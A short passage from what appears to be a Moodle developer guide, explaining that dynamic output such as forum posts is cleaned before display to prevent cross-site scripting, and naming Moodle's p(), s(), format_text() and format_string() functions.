At some point, as you create your code, you will need to output information to the screen. Because you can't always be sure what you are writing is safe, you need to make sure that you process it before writing it out. This is especially true for output that has been created dynamically by others, such as forum posts.
One of the main reasons to do this is to prevent Cross Site Scripting (XSS) attacks. These techniques inject client-side scripts into a displayed web page in order to try to bypass security measures and gain information that they should otherwise not have. These types of attacks can be very dangerous. For more information, see the Moodle Docs page: http://docs.moodle.org/en/Development:Security:Cross-site_scripting#Cleaning_input.
Moodle provides four main functions for this purpose: p(), s(), format_text()
, and format_string()
.